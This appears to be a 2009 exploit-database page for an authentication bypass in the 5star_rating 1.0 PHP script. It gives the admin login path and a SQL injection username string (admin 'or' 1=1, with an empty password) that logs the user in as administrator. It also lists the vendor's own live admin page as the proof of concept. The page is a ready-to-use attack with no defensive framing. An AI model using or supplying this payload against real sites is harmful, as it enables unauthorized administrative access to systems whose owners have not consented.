5 star Rating 1.2 - Authentication Bypass



EKU-ID: 16327 CVE: OSVDB-53889 OSVDB-ID:
Author: zer0day Published: 2009-04-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


@@@@@@@@  @@@@@@@@  @@@@@@@    @@@@@@@@   @@@@@@@    @@@@@@   @@@ @@@
@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@ @@@
     @@!  @@!       @@!  @@@  @@!   @@@@  @@!  @@@  @@!  @@@  @@! !@@
    !@!   !@!       !@!  @!@  !@!  @!@!@  !@!  @!@  !@!  @!@  !@! @!!
   @!!    @!!!:!    @!@!!@!   @!@ @! !@!  @!@  !@!  @!@!@!@!   !@!@!
  !!!     !!!!!:    !!@!@!    !@!!!  !!!  !@!  !!!  !!!@!!!!    @!!!
 !!:      !!:       !!: :!!   !!:!   !!!  !!:  !!!  !!:  !!!    !!:
:!:       :!:       :!:  !:!  :!:    !:!  :!:  !:!  :!:  !:!    :!:
 :: ::::   :: ::::  ::   :::  ::::::: ::   :::: ::  ::   :::     ::
: :: : :  : :: ::    :   : :   : : :  :   :: :  :    :   : :     :


--[ Informations ]------------------------------------------------------

@author : zer0day (zer0day@vodkaorange.com)
@home : gotr00t.blogspot.com
@software : 5star_rating
@version : 1.0
@web site : http://www.maniacomputer.com/5star_rating/New_5Star.html

--[ Exploit ]-----------------------------------------------------------

---{{Authentification ByPass}}
Go to :
http://[TARGET]/5star_rating/admin/control_panel_sample.php
In username just enter : admin 'or' 1=1
and empty password

You are logged in Administrator !

Simply ?

--[ Proof Of Concept ]--------------------------------------------------

http://www.maniacomputer.com/5star_rating/admin/control_panel_sample.php

--[ End Of File ]-------------------------------------------------------

# milw0rm.com [2009-04-22]